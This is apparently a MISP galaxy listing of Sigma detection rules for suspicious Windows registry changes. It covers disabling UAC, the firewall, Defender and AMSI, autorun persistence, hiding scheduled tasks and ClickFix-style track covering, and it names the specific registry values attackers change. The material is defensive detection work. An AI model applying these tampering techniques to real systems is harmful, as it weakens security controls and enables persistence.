UUID 3ae1a046-f7db-439d-b7ce-b8b366b81fa6 which can be used as unique global reference for Disable Windows Security Center Notifications in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-08-19
falsepositive ['Unknown']
filename registry_set_disable_security_center_notifications.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Disable Privacy Settings Experience in Registry

Detects registry modifications that disable Privacy Settings Experience

Internal MISP references

UUID 0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b which can be used as unique global reference for Disable Privacy Settings Experience in Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-10-02
falsepositive ['Legitimate admin script']
filename registry_set_disable_privacy_settings_experience.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Hide Schedule Task Via Index Value Tamper

Detects when the "index" value of a scheduled task is modified from the registry Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique)

Internal MISP references

UUID 5b16df71-8615-4f7f-ac9b-6c43c0509e61 which can be used as unique global reference for Hide Schedule Task Via Index Value Tamper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-26
falsepositive ['Unlikely']
filename registry_set_hide_scheduled_task_via_index_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562']
Related clusters

To see the related clusters, click here.

Suspicious Shim Database Patching Activity

Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.

Internal MISP references

UUID bf344fea-d947-4ef4-9192-34d008315d3a which can be used as unique global reference for Suspicious Shim Database Patching Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-08-01
falsepositive ['Unknown']
filename registry_set_persistence_shim_database_susp_application.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.011']
Related clusters

To see the related clusters, click here.

Lolbas OneDriveStandaloneUpdater.exe Proxy Download

Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json

Internal MISP references

UUID 3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d which can be used as unique global reference for Lolbas OneDriveStandaloneUpdater.exe Proxy Download in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-05-28
falsepositive ['Unknown']
filename registry_set_lolbin_onedrivestandaloneupdater.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.command-and-control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Wow6432Node Windows NT CurrentVersion Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID 480421f9-417f-4d3b-9552-fd2728443ec8 which can be used as unique global reference for Wow6432Node Windows NT CurrentVersion Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019-10-25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

UAC Secure Desktop Prompt Disabled

Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value. The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts. When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.

Internal MISP references

UUID 0d7ceeef-3539-4392-8953-3dc664912714 which can be used as unique global reference for UAC Secure Desktop Prompt Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2024-05-10
falsepositive ['Unknown']
filename registry_set_uac_disable_secure_desktop_prompt.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Common Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID f59c3faf-50f3-464b-9f4c-1b67ab512d99 which can be used as unique global reference for Common Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)
creation_date 2019-10-25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_common.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Suspicious Space Characters in TypedPaths Registry Path - FileFix

Detects the occurrence of numerous space characters in TypedPaths registry paths, which may indicate execution via phishing lures using file-fix techniques to hide malicious commands.

Internal MISP references

UUID 8f2a5c3d-9e4b-4a7c-8d1f-2e5a6b9c3d7e which can be used as unique global reference for Suspicious Space Characters in TypedPaths Registry Path - FileFix in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel (Nextron Systems)
creation_date 2025-11-04
falsepositive ['Unlikely']
filename registry_set_susp_typedpaths_space_characters.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.execution', 'attack.t1204.004', 'attack.defense-evasion', 'attack.t1027.010']
Related clusters

To see the related clusters, click here.

Session Manager Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID 046218bd-e0d8-4113-a3c3-895a12b2b298 which can be used as unique global reference for Session Manager Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019-10-25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_session_manager.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001', 'attack.t1546.009']
Related clusters

To see the related clusters, click here.

Displaying Hidden Files Feature Disabled

Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files. This technique is abused by several malware families to hide their files from normal users.

Internal MISP references

UUID 5a5152f1-463f-436b-b2f5-8eceb3964b42 which can be used as unique global reference for Displaying Hidden Files Feature Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-04-02
falsepositive ['Unknown']
filename registry_set_hide_file.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1564.001']
Related clusters

To see the related clusters, click here.

Directory Service Restore Mode(DSRM) Registry Value Tampering

Detects changes to "DsrmAdminLogonBehavior" registry value. During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an “Administrator” account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure. Attackers could abuse DSRM account to maintain their persistence and access to the organization's Active Directory. If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM. If the "DsrmAdminLogonBehavior" value is set to "1", the administrator account can only be used if the local AD DS service is stopped. If the "DsrmAdminLogonBehavior" value is set to "2", the administrator account can always be used.

Internal MISP references

UUID b61e87c0-50db-4b2e-8986-6a2be94b33b0 which can be used as unique global reference for Directory Service Restore Mode(DSRM) Registry Value Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nischal Khadgi
creation_date 2024-07-11
falsepositive ['Unknown']
filename registry_set_dsrm_tampering.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.credential-access', 'attack.persistence', 'attack.t1556']
Related clusters

To see the related clusters, click here.

Microsoft Office Protected View Disabled

Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.

Internal MISP references

UUID a5c7a43f-6009-4a8c-80c5-32abf1c53ecc which can be used as unique global reference for Microsoft Office Protected View Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021-06-08
falsepositive ['Unlikely']
filename registry_set_office_disable_protected_view_features.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Winlogon Notify Key Logon Persistence

Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.

Internal MISP references

UUID bbf59793-6efb-4fa1-95ca-a7d288e52c88 which can be used as unique global reference for Winlogon Notify Key Logon Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021-12-30
falsepositive ['Unknown']
filename registry_set_winlogon_notify_key.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.004']
Related clusters

To see the related clusters, click here.

Enable Local Manifest Installation With Winget

Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.

Internal MISP references

UUID fa277e82-9b78-42dd-b05c-05555c7b6015 which can be used as unique global reference for Enable Local Manifest Installation With Winget in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-04-17
falsepositive ['Administrators or developers might enable this for testing purposes or to install custom private packages']
filename registry_set_winget_enable_local_manifest.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.persistence']

Suspicious Environment Variable Has Been Registered

Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings

Internal MISP references

UUID 966315ef-c5e1-4767-ba25-fce9c8de3660 which can be used as unique global reference for Suspicious Environment Variable Has Been Registered in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-12-20
falsepositive ['Unknown']
filename registry_set_suspicious_env_variables.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.persistence']

Disable Windows Firewall by Registry

Detect set EnableFirewall to 0 to disable the Windows firewall

Internal MISP references

UUID e78c408a-e2ea-43cd-b5ea-51975cf358c0 which can be used as unique global reference for Disable Windows Firewall by Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-08-19
falsepositive ['Unknown']
filename registry_set_disable_windows_firewall.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Default RDP Port Changed to Non Standard Port

Detects changes to the default RDP port. Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).

Internal MISP references

UUID 509e84b9-a71a-40e0-834f-05470369bd1e which can be used as unique global reference for Default RDP Port Changed to Non Standard Port in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-01-01
falsepositive ['Unknown']
filename registry_set_change_rdp_port.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.010']
Related clusters

To see the related clusters, click here.

NET NGenAssemblyUsageLog Registry Key Tamper

Detects changes to the NGenAssemblyUsageLog registry key. .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section). By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.

Internal MISP references

UUID 28036918-04d3-423d-91c0-55ecf99fb892 which can be used as unique global reference for NET NGenAssemblyUsageLog Registry Key Tamper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-11-18
falsepositive ['Unknown']
filename registry_set_net_cli_ngenassemblyusagelog.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Python Function Execution Security Warning Disabled In Excel - Registry

Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.

Internal MISP references

UUID 17e53739-a1fc-4a62-b1b9-87711c2d5e44 which can be used as unique global reference for Python Function Execution Security Warning Disabled In Excel - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), @Kostastsale
creation_date 2024-08-23
falsepositive ['Unknown']
filename registry_set_office_disable_python_security_warnings.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG

Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".

Internal MISP references

UUID 7021255e-5db3-4946-a8b9-0ba7a4644a69 which can be used as unique global reference for Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2023-08-02
falsepositive ['Unknown']
filename registry_set_provisioning_command_abuse.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

UAC Disabled

Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0.

Internal MISP references

UUID 48437c39-9e5f-47fb-af95-3d663c3f2919 which can be used as unique global reference for UAC Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-01-05
falsepositive ['Unknown']
filename registry_set_uac_disable.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Add Debugger Entry To Hangs Key For Persistence

Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes

Internal MISP references

UUID 833ef470-fa01-4631-a79b-6f291c9ac498 which can be used as unique global reference for Add Debugger Entry To Hangs Key For Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-07-21
falsepositive ['This value is not set by default but could be rarly used by administrators']
filename registry_set_hangs_debugger_persistence.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

New DNS ServerLevelPluginDll Installed

Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)

Internal MISP references

UUID e61e8a88-59a9-451c-874e-70fcc9740d67 which can be used as unique global reference for New DNS ServerLevelPluginDll Installed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017-05-08
falsepositive ['Unknown']
filename registry_set_dns_server_level_plugin_dll.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.defense-evasion', 'attack.t1574.001', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Registry Explorer Policy Modification

Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)

Internal MISP references

UUID 1c3121ed-041b-4d97-a075-07f54f20fb4a which can be used as unique global reference for Registry Explorer Policy Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-03-18
falsepositive ['Legitimate admin script']
filename registry_set_set_nopolicies_user.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Modification of IE Registry Settings

Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert JavaScript for persistence

Internal MISP references

UUID d88d0ab2-e696-4d40-a2ed-9790064e66b3 which can be used as unique global reference for Modification of IE Registry Settings in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-01-22
falsepositive ['Unknown']
filename registry_set_persistence_ie.yml
level low
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Disable Microsoft Defender Firewall via Registry

Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage

Internal MISP references

UUID 974515da-6cc5-4c95-ae65-f97f9150ec7f which can be used as unique global reference for Disable Microsoft Defender Firewall via Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-01-09
falsepositive ['Unknown']
filename registry_set_disable_defender_firewall.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Enable Microsoft Dynamic Data Exchange

Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.

Internal MISP references

UUID 63647769-326d-4dde-a419-b925cc0caf42 which can be used as unique global reference for Enable Microsoft Dynamic Data Exchange in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-02-26
falsepositive ['Unknown']
filename registry_set_office_enable_dde.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.execution', 'attack.t1559.002']
Related clusters

To see the related clusters, click here.

Folder Removed From Exploit Guard ProtectedFolders List - Registry

Detects the removal of folders from the "ProtectedFolders" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder

Internal MISP references

UUID 272e55a4-9e6b-4211-acb6-78f51f0b1b40 which can be used as unique global reference for Folder Removed From Exploit Guard ProtectedFolders List - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-05
falsepositive ['Legitimate administrators removing applications (should always be investigated)']
filename registry_delete_exploit_guard_protected_folders.yml
level high
logsource.category registry_delete
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Removal Of SD Value to Hide Schedule Task - Registry

Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry hive to hide schedule task. This technique is used by Tarrask malware

Internal MISP references

UUID acd74772-5f88-45c7-956b-6a7b36c294d2 which can be used as unique global reference for Removal Of SD Value to Hide Schedule Task - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sittikorn S
creation_date 2022-04-15
falsepositive ['Unknown']
filename registry_delete_schtasks_hide_task_via_sd_value_removal.yml
level medium
logsource.category registry_delete
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562']
Related clusters

To see the related clusters, click here.

Delete Defender Scan ShellEx Context Menu Registry Key

Detects deletion of registry key that adds 'Scan with Defender' option in context menu. Attackers may use this to make it harder for users to scan files that are suspicious.

Internal MISP references

UUID 72a0369a-2576-4aaf-bfc9-6bb24a574ac6 which can be used as unique global reference for Delete Defender Scan ShellEx Context Menu Registry Key in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Matt Anderson (Huntress)
creation_date 2025-07-11
falsepositive ['Unlikely as this weakens defenses and normally would not be done even if using another AV.']
filename registry_delete_defender_context_menu.yml
level medium
logsource.category registry_delete
logsource.product windows
tags ['attack.defense-evasion']

Terminal Server Client Connection History Cleared - Registry

Detects the deletion of registry keys containing the MSTSC connection history

Internal MISP references

UUID 07bdd2f5-9c58-4f38-aec8-e101bb79ef8d which can be used as unique global reference for Terminal Server Client Connection History Cleared - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021-10-19
falsepositive ['Unknown']
filename registry_delete_mstsc_history_cleared.yml
level high
logsource.category registry_delete
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1070', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Removal of Potential COM Hijacking Registry Keys

Detects any deletion of entries in ".*\shell\open\command" registry keys. These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.

Internal MISP references

UUID 96f697b0-b499-4e5d-9908-a67bec11cdb6 which can be used as unique global reference for Removal of Potential COM Hijacking Registry Keys in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020-05-02
falsepositive ['Legitimate software (un)installations are known to cause false positives. Please add them as a filter when encountered']
filename registry_delete_removal_com_hijacking_registry_key.yml
level medium
logsource.category registry_delete
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Removal Of AMSI Provider Registry Keys

Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.

Internal MISP references

UUID 41d1058a-aea7-4952-9293-29eaaf516465 which can be used as unique global reference for Removal Of AMSI Provider Registry Keys in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021-06-07
falsepositive ['Unlikely']
filename registry_delete_removal_amsi_registry_key.yml
level high
logsource.category registry_delete
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted

Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value. Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.

Internal MISP references

UUID 5dfc1465-8f65-4fde-8eb5-6194380c6a62 which can be used as unique global reference for Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sajid Nawaz Khan
creation_date 2024-06-02
falsepositive ['Legitimate use/activation of Windows Recall']
filename registry_delete_enable_windows_recall.yml
level medium
logsource.category registry_delete
logsource.product windows
tags ['attack.collection', 'attack.t1113']
Related clusters

To see the related clusters, click here.

RunMRU Registry Key Deletion - Registry

Detects attempts to delete the RunMRU registry key, which stores the history of commands executed via the run dialog. In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands. Adversaries may delete this key to cover their tracks after executing commands.

Internal MISP references

UUID 3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55 which can be used as unique global reference for RunMRU Registry Key Deletion - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel (Nextron Systems)
creation_date 2025-09-25
falsepositive ['Unknown']
filename registry_delete_runmru.yml
level high
logsource.category registry_delete
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1070.003']
Related clusters

To see the related clusters, click here.

Removal Of Index Value to Hide Schedule Task - Registry

Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query"

Internal MISP references

UUID 526cc8bc-1cdc-48ad-8b26-f19bff969cec which can be used as unique global reference for Removal Of Index Value to Hide Schedule Task - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-26
falsepositive ['Unknown']
filename registry_delete_schtasks_hide_task_via_index_value_removal.yml
level medium
logsource.category registry_delete
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562']
Related clusters

To see the related clusters, click here.

Atbroker Registry Change

Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'

Internal MISP references

UUID 9577edbb-851f-4243-8c91-1d5b50c1a39b which can be used as unique global reference for Atbroker Registry Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mateusz Wydra, oscd.community
creation_date 2020-10-13
falsepositive ['Creation of non-default, legitimate at usage']
filename registry_event_susp_atbroker_change.yml
level medium
logsource.category registry_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1218', 'attack.persistence', 'attack.t1547']
Related clusters

To see the related clusters, click here.

New PortProxy Registry Entry Added

Detects the modification of the PortProxy registry key which is used for port forwarding.

Internal MISP references

UUID a54f842a-3713-4b45-8c84-5f136fdebd3c which can be used as unique global reference for New PortProxy Registry Entry Added in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Andreas Hunkeler (@Karneades)
creation_date 2021-06-22
falsepositive ['WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)', 'Synergy Software KVM (https://symless.com/synergy)']
filename registry_event_portproxy_registry_key.yml
level medium
logsource.category registry_event
logsource.product windows
tags ['attack.lateral-movement', 'attack.defense-evasion', 'attack.command-and-control', 'attack.t1090']
Related clusters

To see the related clusters, click here.

New DLL Added to AppCertDlls Registry Key

Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.

Internal MISP references

UUID 6aa1d992-5925-4e9f-a49b-845e51d1de01 which can be used as unique global reference for New DLL Added to AppCertDlls Registry Key in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilyas Ochkov, oscd.community
creation_date 2019-10-25
falsepositive ['Unknown']
filename registry_event_new_dll_added_to_appcertdlls_registry_key.yml
level medium
logsource.category registry_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.009']
Related clusters

To see the related clusters, click here.

Windows Registry Trust Record Modification

Alerts on trust record modification within the registry, indicating usage of macros

Internal MISP references

UUID 295a59c1-7b79-4b47-a930-df12c15fc9c2 which can be used as unique global reference for Windows Registry Trust Record Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Antonlovesdnb, Trent Liffick (@tliffick)
creation_date 2020-02-19
falsepositive ['This will alert on legitimate macro usage as well, additional tuning is required']
filename registry_event_office_trust_record_modification.yml
level medium
logsource.category registry_event
logsource.product windows
tags ['attack.initial-access', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

Windows Defender Threat Severity Default Action Modified

Detects modifications or creations of Windows Defender's default threat action settings based on severity to 'allow' or take 'no action'. This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level, allowing malicious software to run unimpeded. An attacker might use this technique to bypass defenses before executing payloads.

Internal MISP references

UUID 5a9e1b2c-8f7d-4a1e-9b3c-0f6d7e5a4b1f which can be used as unique global reference for Windows Defender Threat Severity Default Action Modified in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Matt Anderson (Huntress)
creation_date 2025-07-11
falsepositive ['Legitimate administration via scripts or tools (e.g., SCCM, Intune, GPO enforcement). Correlate with administrative activity.', 'Software installations that legitimately modify Defender settings (less common for these specific keys).']
filename registry_event_defender_threat_action_modified.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Registry Persistence Mechanisms in Recycle Bin

Detects persistence registry keys for Recycle Bin

Internal MISP references

UUID 277efb8f-60be-4f10-b4d3-037802f37167 which can be used as unique global reference for Registry Persistence Mechanisms in Recycle Bin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021-11-18
falsepositive ['Unknown']
filename registry_event_persistence_recycle_bin.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547']
Related clusters

To see the related clusters, click here.

Shell Open Registry Keys Manipulation

Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)

Internal MISP references

UUID 152f3630-77c1-4284-bcc0-4cc68ab2f6e7 which can be used as unique global reference for Shell Open Registry Keys Manipulation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021-08-30
falsepositive ['Unknown']
filename registry_event_shell_open_keys_manipulation.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002', 'attack.t1546.001']
Related clusters

To see the related clusters, click here.

Run Once Task Configuration in Registry

